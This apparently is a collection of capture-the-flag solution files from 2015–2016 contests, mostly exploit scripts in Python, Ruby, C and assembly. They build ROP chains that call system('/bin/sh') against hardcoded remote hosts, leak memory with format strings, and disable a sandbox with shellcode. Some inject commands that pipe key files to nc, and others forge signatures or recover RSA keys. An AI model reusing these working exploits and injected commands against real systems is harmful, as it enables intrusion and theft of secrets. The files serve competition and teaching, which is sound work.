 3 | from socket import *
 4 | import struct
 5 | 
 6 | def p64(n):
 7 |     return struct.pack('<Q', n)
 8 | def up64(s):
 9 |     return struct.unpack('<Q', s)[0]
10 | 
11 | #ADDR = ('localhost', 666)
12 | ADDR = ('136.243.194.41', 666)
13 | def send_string(msg):
14 |     f.write(p64(len(msg)))
15 |     f.write(msg)
16 | 
17 | def spray():
18 |     for i in xrange(1024 * 1024):
19 |         payload = "a" * 16 + p64(0x400480)[:-1]
20 |         send_string(payload)
21 |         print(f.readline())
22 | 
23 | if __name__ == '__main__':
24 | 	    s = create_connection(ADDR)
25 | 	    f = s.makefile(bufsize = 0)
26 | 
27 | 	    # leak stack address
28 | 	    send_string("a"*9)
29 | 	    base = up64(("\x00" + f.readline().strip()[9:]).ljust(8, "\x00"))
30 | 	    print("BASE : %16X" % base)
31 | 	    #if (j == 0):
32 | 	    #    libc_base = base - 0x5e6000 + 0x1000 * i
33 | 	    #else:
34 | 	    #    libc_base = base - 0x5e6000 - 0x1000 * i
35 | 	    libc_base = base - 0x5EA000
36 | 	    print("DIFF : %16X" % (libc_base - base))
37 | 
38 | 	    # change rbp
39 | 	    new_rbp = base - 0x800
40 | 	    payload = "a" * 8 + p64(new_rbp) + p64(0x4004D4)[:-1]
41 | 	    send_string(payload)
42 | 	    f.readline()
43 | 
44 | 	    send_string(payload)
45 | 	    pop_rdi = libc_base + 0x13729E
46 | 	    system = libc_base + 0x443D0
47 | 	    bin_sh = libc_base + 0x18C3DD
48 | 
49 | 	    payload = "a"*16 + p64(pop_rdi) + p64(bin_sh) + p64(system)
50 | 	    send_string(payload)
51 | 	    f.write("ps -aux;exit\n")
52 | 
53 | 	    while True:
54 | 		r = f.readline()
55 | 		if not r: break
56 | 		print(r),
57 | 


--------------------------------------------------------------------------------
/2015/bkp-ctf/andrew/exploit.txt:
--------------------------------------------------------------------------------
1 | http://54.88.83.98/file%3A%2F%2F%2Fflag.txt
2 | 


--------------------------------------------------------------------------------
/2015/bkp-ctf/harvard/exploit.rb:
--------------------------------------------------------------------------------
 1 | require 'socket'
 2 | class Exploit
 3 |   def initialize
 4 |     @s = TCPSocket.new('52.1.91.215', 2114)
 5 | #    @s = TCPSocket.new('localhost', 8082)
 6 |     puts @s.read("enter any cheat if you know of it ;-) : ".length)
 7 | #    @s.write('a'*24 + [0x4017DF].pack('Q') + "\n")
 8 |     @s.write('a'*24 + [0x4017DF].pack('Q') + "\n")
 9 |     11.times { puts @s.readline }
10 |     @s.write("1\n")
11 |     puts @s.readline
12 |     @s.write("1\n")
13 |     puts @s.readline
14 |     @s.write("1\n")
15 |     puts @s.readline
16 |     puts @s.readline
17 | 
18 |     puts "======================="
19 |     @s.write("2\n")
20 |     puts @s.readline
21 | 
22 |     2.times  do
23 |       @s.write("1\n")
24 |       puts @s.readline
25 |     end
26 | 
27 |     @s.write("5\n")
28 |     puts @s.readline
29 |     puts @s.read('CONGRAZZ A new HI SCORE! What is your name? '.length)
30 | 
31 |     # read : /bin/sh copy
32 |     # puts __libc
33 |     # jmp system with /bin/sh
34 |     @buf = 0x605730
35 |     @read_got = 0x605078
36 |     @pop_gadget = 0x402FBA
37 |     @call_gadget = 0x0402FA0
38 |     @pop_rdi_ret = 0x402FC3
39 |     @puts = 0x400CD0 
40 |     @libc_got = 0x605080
41 |     @vuln = 0x4017DF 
42 |     readline
43 | 
44 |     payload = [@pop_gadget, 0, 1, @read_got, 0x1000, @buf, 0, @call_gadget]
45 |     payload += [0] * 7 + [@pop_rdi_ret, @libc_got, @puts, @vuln]
46 | 
47 |     @s.write('a'*0x118 + payload.pack('Q*') + "\n")
48 |     @s.write("/bin/sh\n")
49 | 
50 |     17.times { puts @s.readline }
51 |     @libc_base = @s.readline[0..-2].ljust(8, "\x00").unpack('Q')[0] - 0x0021DD0
52 |     puts "- Libc : 0x%08x" % @libc_base
53 |     @system = @libc_base + 0x46640
54 | 
55 |     @s.write('a'*0x118 + [@pop_rdi_ret, @buf, @system].pack('Q*') + "\n") 
56 |     @s.write("cat flag\n")
57 | 
58 |     loop { print @s.read(1) }
59 |   end
60 | end
61 | 
62 | s = Exploit.new
63 | 


--------------------------------------------------------------------------------
/2015/bkp-ctf/harvard/time.c:
--------------------------------------------------------------------------------
 1 | int main()
 2 | {
 3 |   int t = time(0);
 4 |   srand(t);
 5 |   int i;
 6 |   for (i = 0; i < 1024; i++)
 7 |   {
 8 |     printf("%x\n", rand());
 9 |   }
10 | }
11 | 


--------------------------------------------------------------------------------
/2015/bkp-ctf/wood_island/dist/brute.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <string.h>
 3 | #include <openssl/sha.h>
 4 | int main(int argc, char** argv)
 5 | {
 6 |   unsigned char ibuf[21];
 7 |   unsigned char obuf[20];
 8 |   unsigned int i, j;
 9 |   memset(ibuf, 'a', sizeof(ibuf) - 1);
10 |   ibuf[20] = 0;
11 |   memcpy(ibuf, argv[1], strlen(argv[1]));
12 |   char end = 0x77;
13 |   char start = 0x30;
14 | 
15 |   char a, b, c, d, e;
16 | 
17 |   for(a = 0x41; a < 0x7a; a++)
18 |   {
19 |     ibuf[15] = a;
20 |     for(b = 0x41; b < 0x7a; b++)
21 |     {
22 |       ibuf[16] = b;
23 |       for (c = 0x41; c < 0x7a; c++)
24 |       {
25 |         ibuf[17] = c;
26 |         for (d  = 0x41; d < 0x7a; d++)
27 |         {
28 |           ibuf[18] = d;
29 |           for (e = 0x41; e < 0x7a; e++)
30 |           {
31 |             ibuf[19] = e;
32 | 
33 |             SHA1(ibuf, sizeof(ibuf) - 1, obuf);
34 |             if (obuf[19] == 0xff && obuf[18] == 0xff && obuf[17] == 0xff)
35 |             {
36 |               printf("%d\n", obuf[19]);
37 |               printf("%s", ibuf);
38 |               return;
39 |             }
40 | 
41 |           }
42 |         }
43 |       }
44 |     }
45 |   }
46 | 
47 | }
48 | 


--------------------------------------------------------------------------------
/2015/bkp-ctf/wood_island/dist/solve.rb:
--------------------------------------------------------------------------------
 1 | require 'json'
 2 | require 'digest'
 3 | require 'pwnbox'
 4 | require 'socket'
 5 | 
 6 | include Pwnbox
 7 | include Pwnbox::Number
 8 | 
 9 | def sha384(m)
10 |   Digest::SHA384.hexdigest(m).to_i(16)
11 | end
12 | 
13 | dict = {}
14 | 
15 | File.open('sigs.txt', 'r') do |f|
16 |   while(!f.eof?)
17 |     obj = JSON.parse(f.readline)
18 |     r = obj["r"]
19 |     dict[r] = []if !dict[r]
20 |     dict[r].push(obj)
21 |   end
22 | end
23 | 
24 | dict.each do |x, y|
25 |   if y.length ==  1
26 |     dict.delete(x)
27 |   end
28 | end
29 | 
30 | def solve_linear_congruence_equation(a, b, m)
31 |   d = Pwnbox::Number.gcd(a, b)
32 |   root = Pwnbox::Number.solve_linear_congruence_equation(a, b, m)
33 |   return nil if !root
34 | 
35 |   res = []
36 | 
37 |   d.times do |i|
38 |     res.push(root + i * m / d)
39 |   end
40 |   return res
41 | end
42 | 
43 | def gcd(x,y)
44 |   Pwnbox::Number.gcd(x,y)
45 | end
46 | def pow(a,b,c)
47 |   Pwnbox::Number.pow(a,b,c)
48 | end
49 | 
50 | g = 5
51 | 
52 | p = 27327395392065156535295708986786204851079528837723780510136102615658941290873291366333982291142196119880072569148310240613294525601423086385684539987530041685746722802143397156977196536022078345249162977312837555444840885304704497622243160036344118163834102383664729922544598824748665205987742128842266020644318535398158529231670365533130718559364239513376190580331938323739895791648429804489417000105677817248741446184689828512402512984453866089594767267742663452532505964888865617589849683809416805726974349474427978691740833753326962760114744967093652541808999389773346317294473742439510326811300031080582618145727
53 | 
54 | dict.each do |x, y|
55 |   sig1, sig2 = y[0], y[1]
56 |   s1, s2 = sig1["s"], sig2["s"]
57 |   m1, m2 = sha384(sig1["m"]), sha384(sig2["m"])
58 |   r = sig1["r"]
59 |   m = p - 1
60 | 
61 |   d = Pwnbox::Number.gcd((s1 - s2), p - 1)
62 |   root =solve_linear_congruence_equation(s1-s2, m1-m2, p-1)
63 |   if root
64 |     root.each do |k|
65 |       if pow(g, k, p) == sig1["r"]
66 |         x_l = solve_linear_congruence_equation(-r, s1 * k - m1, p - 1)
67 | 
68 |         k = rand(0..p-2)
69 |         r = pow(g, k, p)
70 |         go = "There is no need to be upset"
71 |         o = {}
72 |         o["r"] = r
73 |         o["m"] = go
74 | 
75 |         x_l.each do |x|
76 |           o["s"] = (sha384(go) - x * r) * Pwnbox::Number.mod_inverse(k, p - 1)
77 |           o["s"] %= p - 1
78 |           puts (o.to_json)
79 |         end
80 |       end
81 |     end
82 |   end
83 | end
84 | 


--------------------------------------------------------------------------------
/2015/codegate/bookstore/solve.rb:
--------------------------------------------------------------------------------
  1 | require 'socket'
  2 | 
  3 | class Exploit
  4 |   def shell
  5 |     Thread.new { loop { print @s.read(1) }}
  6 |     loop do 
  7 |       @s.write(readline())
  8 |     end
  9 |   end
 10 |   def initialize
 11 | #    @s = TCPSocket.new('54.65.201.110', 31337)
 12 |     @s = TCPSocket.new('localhost', 31337)
 13 |     17.times { puts @s.readline }
 14 |     puts @s.read("== Input Your ID : ".length)
 15 |     @s.write("helloadmin\n")
 16 |     puts @s.read("== Input Your PASSWORD : ".length)
 17 |     @s.write("iulover!@\#$\n")
 18 |     puts @s.readline
 19 |     puts @s.readline
 20 | 
 21 |     add_book('a'*0x13,'b'*299,0)
 22 | 
 23 |     #enter menu
 24 |     memory_leak()
 25 | 
 26 |     enter_modify(0)
 27 |     modify()
 28 |     @s.write("2\n")
 29 |     modify_desc([@bin_base + 0x8db].pack('I') * 750)
 30 | #    modify_desc("a"* 3000)
 31 |     readline
 32 |     modify()
 33 |     modify_info()
 34 | 
 35 |     modify()
 36 |     modify_ship()
 37 | 
 38 |     modify()
 39 |     @s.write("0\n")
 40 |     puts @s.read(4)
 41 | 
 42 |     read_menu()
 43 |     show_info(0)
 44 |     readline
 45 | 
 46 |     shell()
 47 |   end
 48 | 
 49 |   def memory_leak()
 50 |     enter_modify(0)
 51 |     modify()
 52 | 
 53 |     @s.write("3\n")
 54 |     puts @s.readline
 55 |     @s.write("#{0xffffffff}\n")
 56 |     puts @s.readline
 57 |     @s.write("#{0xffffffff}\n")
 58 |     puts @s.readline
 59 |     @s.write("1\n")
 60 |     puts @s.readline
 61 |     @s.write("1\n")
 62 | 
 63 |     # filename
 64 |     puts @s.readline
 65 |     @s.write("c"*0x20)
 66 |     puts @s.readline
 67 | 
 68 |     # desc
 69 |     puts @s.readline
 70 |     @s.write("c"*0x20)
 71 |     puts @s.readline
 72 | 
 73 |     modify()
 74 |     @s.write("0\n")
 75 |     puts @s.read("Exit".length)
 76 | 
 77 |     read_menu()
 78 |     @s.write("4\n")
 79 |     puts @s.readline
 80 |     @bin_base = @s.readline[74..77].unpack('<I')[0] - 0x9ad
 81 |     puts "#{@bin_base.to_s(16)}"
 82 |     puts @s.readline
 83 |     puts @s.readline
 84 |      readline
 85 |   end
 86 | 
 87 |   def enter_modify(index)
 88 |     read_menu()
 89 |     @s.write("2\n")
 90 |     puts @s.read("Input No : ".length)
 91 |     @s.write("#{index}\n")
 92 |   end
 93 | 
 94 |   def show_info(index)
 95 |     @s.write("3\n")
 96 |     puts @s.read("Input No : ".length)
 97 |     readline
 98 |     @s.write("#{index}\n")
 99 |   end
100 | 
101 |   def modify_ship
102 |     @s.write("4\n")
103 |     puts @s.readline
104 |     @s.write("1\n")
105 |     puts @s.readline
106 |   end
107 | 
108 |   def modify()
109 |     6.times { puts @s.readline }
110 |   end
111 | 
112 |   def modify_info()
113 |     @s.write("3\n")
114 |     puts @s.readline
115 |     @s.write("1234\n")
116 |     puts @s.readline
117 |     @s.write("1234\n")
118 |     puts @s.readline
119 |     @s.write("0\n") # free ship
120 |     puts @s.readline
121 |     @s.write("0\n")
122 |     modify_bookname("/home/bookstore/key\x00")
123 |     modify_desc("A"*2000)
124 |   end
125 | 
126 |   def modify_desc(name)
127 |     puts @s.readline
128 |     @s.write("#{name}\n")
129 |     puts @s.readline
130 |   end
131 | 
132 |   def modify_bookname(name)
133 |     puts @s.readline
134 |     @s.write("#{name}\n")
135 |     puts @s.readline
136 |   end
137 | 
138 |   def read_menu
139 |     7.times { puts @s.readline }
140 |     puts @s.read("> ".length)
141 |   end
142 | 
143 |   def add_book(name, desc, type, max_download = 0)
144 |     read_menu()
145 |     @s.write("1\n")
146 |     puts @s.readline
147 |     @s.write(name + "\n")
148 |     puts @s.readline
149 |     @s.write(desc + "\n")
150 |     puts @s.readline
151 |     @s.write("#{type}\n")
152 |     puts @s.readline
153 |     puts @s.readline
154 | 
155 |     if type == 1
156 |       puts @s.readline
157 |       @s.write("#{max_download}\n")
158 |     end
159 | 
160 |     puts @s.readline
161 |   end
162 | end
163 | 
164 | s = Exploit.new
165 | 


--------------------------------------------------------------------------------
/2015/codegate/steak/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc -c -fPIC exploit.c -o exploit.o
3 | 	gcc exploit.o -shared -o libexploit.so
4 | 


--------------------------------------------------------------------------------
/2015/codegate/steak/exploit.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | size_t strcspn(const char *s, const char *reject)
3 | {
4 |     execve("/bin/sh", NULL, NULL);
5 | }
6 | 


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/extract.rb:
--------------------------------------------------------------------------------
1 | File.open(ARGV[0], 'rb') do |f|
2 |   data = f.read()
3 |   first = data.index("XXXX") + 4
4 |   data = data[first.. -1]
5 |   last = data.index("XXXX")
6 | 
7 |   p data[0..last - 1]
8 | end
9 | 


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/make.sh:
--------------------------------------------------------------------------------
 1 | echo "@shellcode="
 2 | nasm -f elf32 ./read.s
 3 | ruby extract.rb ./read.o
 4 | 
 5 | echo "@wpipe="
 6 | nasm -f elf32 ./write_pipe.s
 7 | ruby extract.rb ./write_pipe.o
 8 | 
 9 | echo "@rpipe="
10 | nasm -f elf32 ./read_pipe.s
11 | ruby extract.rb ./read_pipe.o
12 | 


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/read.s:
--------------------------------------------------------------------------------
 1 | section     .text
 2 | global      _start
 3 | 
 4 | _start:
 5 |   pop eax
 6 |   pop eax
 7 |   pop eax
 8 |   pop eax ; start
 9 | 
10 |   xor eax, eax
11 |   mov edx, eax  ; edx = 0
12 |   mov ebx, eax  ; ebx = 0
13 |   mov al, 3
14 |   mov ecx, 0x804c330
15 |   mov bl, 4
16 |   mov dx, 0x3ff
17 |   int 0x80
18 | 
19 |   mov eax, 0x804c330
20 |   jmp eax
21 | 
22 |   pop eax ; end
23 |   pop eax
24 |   pop eax
25 |   pop eax
26 | 
27 | 
28 | section     .data
29 | 


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/read_pipe.s:
--------------------------------------------------------------------------------
 1 | section     .text
 2 | global      _start
 3 | 
 4 | _start:
 5 |   pop eax
 6 |   pop eax
 7 |   pop eax
 8 |   pop eax ; start
 9 | 
10 |   ; buf : 0xc930
11 |   ; read
12 |   xor eax, eax
13 |   mov edx, eax  ; edx = 0
14 |   mov ebx, eax  ; ebx = 0
15 |   mov al, 3
16 |   mov ecx, 0x804c930
17 |   mov bl, 4
18 |   mov dx, 0x3ff
19 |   int 0x80
20 | 
21 |   mov edx, eax ; save result
22 | 
23 |   ; write
24 |   xor eax, eax
25 |   mov ebx, eax  ; ebx = 0
26 |   mov al, 4
27 |   mov ecx, 0x804c930
28 |   mov bl, 7
29 |   int 0x80
30 | 
31 |   pop eax ; end
32 |   pop eax
33 |   pop eax
34 |   pop eax
35 | 
36 | section     .data
37 | 


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/write_pipe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/insuyun/CTF-writeup/838addc6c4a4321eb03f557e09f575dd5cb76e68/2015/gits/boxxy/shellcode/write_pipe


--------------------------------------------------------------------------------
/2015/gits/boxxy/shellcode/write_pipe.s:
--------------------------------------------------------------------------------
 1 | section     .text
 2 | global      _start
 3 | 
 4 | _start:
 5 |   pop eax
 6 |   pop eax
 7 |   pop eax
 8 |   pop eax ; start
 9 | 
10 |   ; buf : 0xc930
11 |   ; read
12 |   xor eax, eax
13 |   mov edx, eax  ; edx = 0
14 |   mov ebx, eax  ; ebx = 0
15 |   mov al, 3
16 |   mov ecx, 0x804c930
17 |   mov bl, 4
18 |   mov dx, 0x3ff
19 |   int 0x80
20 | 
21 |   mov edx, eax ; save result
22 | 
23 |   ; write
24 |   xor eax, eax
25 |   mov ebx, eax  ; ebx = 0
26 |   mov al, 4
27 |   mov ecx, 0x804c930
28 |   mov bl, 7
29 |   int 0x80
30 | 
31 |   pop eax ; end
32 |   pop eax
33 |   pop eax
34 |   pop eax
35 | 
36 | section     .data
37 | 


--------------------------------------------------------------------------------
/2015/gits/giggles/solve.py:
--------------------------------------------------------------------------------
  1 | import telnetlib, struct
  2 | from socket import *
  3 | 
  4 | s = create_connection(('10.211.55.6', 1423))
  5 | 
  6 | PB = lambda x:struct.pack('B', x)
  7 | PH = lambda x:struct.pack('H', x)
  8 | PI = lambda x:struct.pack('I', x)
  9 | PQ = lambda x:struct.pack('Q', x)
 10 | UPH = lambda x:struct.unpack('H', x)[0]
 11 | 
 12 | def req(type, payload):
 13 |     p = PB(type) + PH(len(payload)) + payload
 14 |     #print repr(p)
 15 |     s.send(p)
 16 | 
 17 | def recv():
 18 |     length = UPH(s.recv(2))
 19 |     return s.recv(length)
 20 | """
 21 | struct __attribute__ ((__packed__)) operation
 22 | {
 23 |     uint16_t opcode;
 24 |     uint64_t operand1;
 25 |     uint64_t operand2;
 26 |     uint64_t operand3;
 27 | };
 28 | 
 29 | struct __attribute__ ((__packed__)) function
 30 | {
 31 |     uint16_t num_ops;
 32 |     uint16_t num_args;
 33 |     uint8_t verified;
 34 |     struct operation bytecode[MAX_OPS];
 35 | };
 36 | 
 37 | struct __attribute__ ((__packed__)) run_func
 38 | {
 39 |     uint16_t index;
 40 |     uint16_t num_args;
 41 |     uint32_t args[];
 42 | };
 43 | """
 44 | TYPE_ADDFUNC=0
 45 | TYPE_VERIFY=1
 46 | TYPE_RUNFUNC=2
 47 | 
 48 | OP_ADD=0
 49 | OP_BR=1
 50 | OP_BEQ=2
 51 | OP_BGT=3
 52 | OP_MOV=4
 53 | OP_OUT=5
 54 | OP_EXIT=6
 55 | 
 56 | def op(o, a1, a2 ,a3):
 57 |     return PH(o) + PQ(a1) + PQ(a2) + PQ(a3)
 58 | def op_out(a1):
 59 |     return op(OP_OUT, a1, 0, 0)
 60 | def op_exit():
 61 |     return op(OP_EXIT, 0, 0, 0)
 62 | def op_mov(a1, a2):
 63 |     return op(OP_MOV, a1, a2, 0)
 64 | def op_br(a1):
 65 |     return op(OP_BR, a1, 0, 0)
 66 | 
 67 | LDW = lambda x: x % (1<<32)
 68 | HDW = lambda x: x >> 32
 69 | 
 70 | raw_input()
 71 | # add_dummy
 72 | func = PH(0) + PH(10) + PB(0)
 73 | req(TYPE_ADDFUNC, func)
 74 | print repr(recv())
 75 | 
 76 | # verify
 77 | verify = PH(0)
 78 | req(TYPE_VERIFY, verify)
 79 | print repr(recv())
 80 | 
 81 | # add_real
 82 | func = PH(5) + PH(0) + PB(0)
 83 | payload = "\x00" * (26 - len(func)) # remaind
 84 | """
 85 | # leak
 86 | payload += op_out(26)
 87 | payload += op_out(27)
 88 | #payload += op_out(26 + 48)
 89 | #payload += op_out(27 + 48)
 90 | """
 91 | 
 92 | bin_base = 0x555555555efd - 0x1EFD
 93 | libc_base = 0x7ffff7834ec5 - 0x21ec5
 94 | payload += op_mov(26, 1)
 95 | payload += op_mov(27, 2)
 96 | payload += op_mov(28, 3)
 97 | payload += op_br(61)
 98 | payload = payload.ljust(26 * 5, "\x00") # fit to size
 99 | func += payload
100 | req(TYPE_ADDFUNC, func)
101 | print repr(recv())
102 | 
103 | func = PH(30) + PH(0) + PB(0)
104 | payload = "\x00" * (26 - len(func) * 2) # remaind
105 | payload += op_mov(29, 4)
106 | payload += op_mov(30, 5)
107 | payload += op_mov(31, 6)
108 | payload += "D"*20
109 | payload += ";cat /home/giggle/key|nc localhost 8080;"
110 | payload = payload.ljust(26 * 30, "D") # fit to size
111 | func += payload
112 | req(TYPE_ADDFUNC, func)
113 | print repr(recv())
114 | 
115 | # run func
116 | system = libc_base + 0x46640
117 | pop_rdi = 0x2053 + bin_base
118 | sh = 0x203817 + bin_base
119 | input = [0] + [LDW(pop_rdi), HDW(pop_rdi), LDW(sh), HDW(sh), LDW(system), HDW(system)]
120 | ex = PH(0) + PH(len(input)) + ''.join(map(PI, input))
121 | req(TYPE_RUNFUNC, ex)
122 | print repr(recv())
123 | 


--------------------------------------------------------------------------------
/2015/leaveret/simple_comment/solve.py:
--------------------------------------------------------------------------------
 1 | from socket import *
 2 | import struct
 3 | 
 4 | s = socket(AF_INET, SOCK_STREAM)
 5 | s.connect(('10.211.55.7', 9999))
 6 | 
 7 | PI = lambda x: struct.pack('I', x)
 8 | PUI = lambda x: struct.unpack('I', x)[0]
 9 | 
10 | def read_until(f):
11 |     r = ''
12 |     while f not in r:
13 |         c = s.recv(1)
14 |         if not c:
15 |             break
16 |         r += c
17 |     return r
18 | 
19 | def until_input():
20 |     return read_until('Input : ')
21 | 
22 | def register(email):
23 |     s.send('1\n')
24 |     print read_until('byte) : ')
25 |     s.send(email + '\n')
26 |     print until_input()
27 | 
28 | def login(email):
29 |     s.send('2\n')
30 |     s.send(email + '\n')
31 |     print until_input()
32 | 
33 | def modify_email(email):
34 |     s.send('5\n')
35 |     raw_input()
36 |     s.send(email + '\n')
37 |     print email
38 |     print until_input()
39 | def gen_payload(num):
40 |     assert(num % 2 == 0)
41 |     result = ''
42 |     for i in xrange(num / 2):
43 |         result += "%02X" % i
44 |     #print repr(result)
45 |     return result
46 | 
47 | print until_input()
48 | payload = 'a' * 480
49 | payload += PI(0x080485A0) + "BBBB" + PI(0x0804C0A0)
50 | payload = payload.ljust(504, "D")
51 | payload += '\x4a\x9c'
52 | assert(len(payload) == 506)
53 | email1 =  payload + '@a.a'
54 | register(email1)
55 | login(email1)
56 | raw_input()
57 | email2 = 'cat /home/simple_comment/key|nc localhost 8080;@a.a'
58 | modify_email(email2)
59 | 


--------------------------------------------------------------------------------
/2015/seccon/fragment2/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | import hpack
 3 | if __name__ == '__main__':
 4 |     data = ''
 5 |     with open('./fragment2.pcap', 'rb') as f:
 6 |         data = f.read()
 7 | 
 8 |     idx = data.find("\x00\x02\x06\x2a") + 4
 9 |     data = data[idx:]
10 | 
11 |     for i in xrange(len(data)):
12 |         for j in xrange(i, len(data)):
13 |             try:
14 |                 d = hpack.Decoder()
15 |                 print("DECODED : %s" % d.decode(data[i:j]))
16 |             except Exception as e:
17 |                 print(e)
18 | 


--------------------------------------------------------------------------------
/2015/seccon/syscall_impossible/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | 
 3 | # TODO
 4 | # 1. compile binary and see assembly
 5 | # 2. make memmem rop & if statement
 6 | 
 7 | from socket import *
 8 | import commands
 9 | import struct
10 | import os
11 | 
12 | #HOST = 'localhost'
13 | HOST = 'pinhole.pwn.seccon.jp'
14 | 
15 | def p64(n):
16 |     return struct.pack('<Q', n)
17 | 
18 | def up64(s):
19 |     return struct.unpack('<Q', s)[0]
20 | 
21 | def build():
22 |     os.system("nasm -felf64 read.S -o read.o")
23 |     os.system("ld -s -o read read.o")
24 |     sc = commands.getoutput("for i in $(objdump -D read |grep \"^ \" |cut -f2); do echo -n $i; done; echo")
25 |     return sc.decode("hex")
26 | 
27 | if __name__ == '__main__':
28 |     s = socket(AF_INET, SOCK_STREAM)
29 |     s.connect((HOST, 10000))
30 |     f = s.makefile('rw', bufsize=0)
31 | 
32 | 
33 |     sc = build()
34 |     payload = "A"*0x118 + p64(0x48a76b) + sc
35 |     payload = payload.ljust(0x200, "A")
36 |     f.write(payload)
37 |     print(repr(f.readline()))
38 |     #print hex(up64(f.readline()[0:8]))
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/2015/seccon/syscall_impossible/read.S:
--------------------------------------------------------------------------------
 1 | global _start
 2 | _start:
 3 |   jmp string
 4 | 
 5 | code:
 6 |   pop rsi ; save string
 7 |   
 8 |   mov rbx, 0 ; init
 9 |   mov rax, 0x304a80418 ; perror got
10 |   mov rax, [rax]
11 |   and rax, 0xfffffffffffff000
12 |   sub rax, 0xad0000 ; offset 
13 | 
14 | loop:
15 |   mov ebx, [rax]
16 |   cmp ebx, 0x69fe8148 ; cmp rdi, 31337
17 |   jz done
18 |   add rax, 1
19 |   jmp loop
20 |   
21 | done:
22 |   xor rbx, rbx
23 |   add rax, 9 ; current address
24 |   add rax, 2
25 |   mov ebx, [rax] ; offset
26 |   add rax, 8 ; end of instruction
27 |   add rax, rbx ; ok get is_impossible_syscall
28 | 
29 |   mov rbx, 0
30 |   mov [rax], rbx ; deactivate sandbox
31 | 
32 |   mov     rdi, rsi
33 |   mov     rsi, 0
34 |   mov     rax, 2
35 |   syscall ; open
36 | 
37 |   mov     rdi, rax
38 |   sub     rsp, 0x1000 ; buffering
39 |   mov     rsi, rsp
40 |   mov     rdx, 0x1000
41 |   mov     rax, 0
42 |   syscall ; read
43 | 
44 |   mov     rdi, 1
45 |   mov     rax, 1
46 |   syscall ; write
47 | 
48 | string:
49 |   call code
50 | db  'flag.txt',0x00
51 | 


--------------------------------------------------------------------------------
/2015/seccon/treewalker/solve.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | from socket import *
 3 | import struct
 4 | 
 5 | HOST = 'localhost'
 6 | HOST = 'treewalker.pwn.seccon.jp'
 7 | 
 8 | def p64(n):
 9 |     return struct.pack('<Q', n)
10 | 
11 | def up64(s):
12 |     assert(len(s) <= 8)
13 |     return struct.unpack('<Q', s.ljust(8, "\x00"))[0]
14 | 
15 | def reqs(msg, length = None):
16 |     req(msg, length)
17 |     return req("\n", read = True)
18 | 
19 | def req(msg, length = None, read = False):
20 |     if not length:
21 |         length = len(msg)
22 |     else:
23 |         assert(length >= len(msg) + 1)
24 |     s.send(p64(length + 1))
25 |     s.send(msg + "\x00")
26 |     if read:
27 |         return f.readline()
28 |     else:
29 |         return None
30 | 
31 | def r(addr):
32 |     payload = "%17llx" * 114
33 |     payload += "%s"
34 |     payload = payload.ljust(8 * 100, "A")
35 |     payload += p64(addr)
36 | 
37 |     res = reqs(payload)
38 |     idx = res.index("A" * 16)
39 |     return res[1938:idx]
40 | 
41 | if __name__ == '__main__':
42 |     s = socket(AF_INET, SOCK_STREAM)
43 | 
44 |     s.connect((HOST, 20000))
45 |     raw_input("Press enter\n")
46 |     f = s.makefile()
47 |     heap = int(f.readline(),16)
48 |     print("HEAP : %016X" % heap)
49 |     bits = ""
50 |     while True:
51 |         ty = r(heap)
52 |         left = r(heap + 8)
53 |         right = r(heap + 16)
54 |         print("BITS : %s" % bits)
55 |         print(repr(ty), repr(left), repr(right))
56 |         if (ty == 'L'):
57 |             break
58 |         if (left == ''):
59 |             bits += "0"
60 |             heap = up64(right)
61 |         elif (right == ''):
62 |             bits += "1"
63 |             heap = up64(left)
64 |         else:
65 |             assert("Cannot find..")
66 | 
67 |     print("ANSWER : %s" % \
68 |             ''.join(map(lambda bits:chr(int(bits,2)), [bits[i:i+8] for i in range(0, len(x), 8)])))
69 | 


--------------------------------------------------------------------------------
/2016/0ctf/equation/.gitignore:
--------------------------------------------------------------------------------
1 | key.pem
2 | flag.enc
3 | mask.png
4 | 


--------------------------------------------------------------------------------
/2016/0ctf/equation/solve.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from base64 import b64decode
 3 | from sage.all import *
 4 | 
 5 | key64 = "Os9mhOQRdqW2cwVrnNI72DLcAXpXUJ1HGwJBANWiJcDUGxZpnERxVw7s0913WXNtV4GqdxCzG0pG5EHThtoTRbyX0aqRP4U/hQ9tRoSoDmBn+3HPITsnbCy67VkCQBM4xZPTtUKM6Xi+16VTUnFVs9E4rqwIQCDAxn9UuVMBXlX2Cl0xOGUF4C5hItrX2woF7LVS5EizR63CyRcPovMCQQDVyNbcWD7N88MhZjujKuSrHJot7WcCaRmTGEIJ6TkU8NWt9BVjR4jVkZ2EqNd0KZWdQPukeynPcLlDEkIXyaQx"
 6 | 
 7 | def get_dp_dq_qinv(key64):
 8 |     result = []
 9 |     key_tab = list(bytearray(b64decode(key64)))
10 |     i = 0
11 |     while i < len(key_tab):
12 |         x = key_tab[i]
13 |         if x == 0x02:  # integer start
14 |             length = key_tab[i + 1]
15 |             octets = key_tab[i + 2: i + 2 + length]
16 |             value = int(str(bytearray(octets)).encode("hex"), 16)
17 |             result.append(value)
18 |             i += 2 + length
19 |         else:
20 |             i += 1
21 |     return tuple(result)
22 | 
23 | # reference : https://eprint.iacr.org/2004/147.pdf
24 | def recover_p_q(dp, dq):
25 |     i = 0
26 |     e = 65537
27 |     dp1 = e * dp - 1
28 |     dq1 = e * dq - 1
29 |     for k in xrange(3, e):
30 |         p, r = divmod(dp1, k)
31 |         if r == 0:
32 |             p += 1
33 |             if p in Primes():
34 |                 for l in xrange(3, e):
35 |                     q, r = divmod(dq1, l)
36 |                     if r == 0:
37 |                         q += 1
38 |                         if q in Primes():
39 |                             return p, q
40 | 
41 | if __name__ == '__main__':
42 |     dp, dq, qinv = get_dp_dq_qinv(key64)
43 |     p, q = recover_p_q(dp, dq)
44 |     print("rsatool.py -p %d -q %d -o key.pem" % (p,q))
45 |     print("openssl rsautl -decrypt -inkey key.pem -in flag.enc")
46 | 


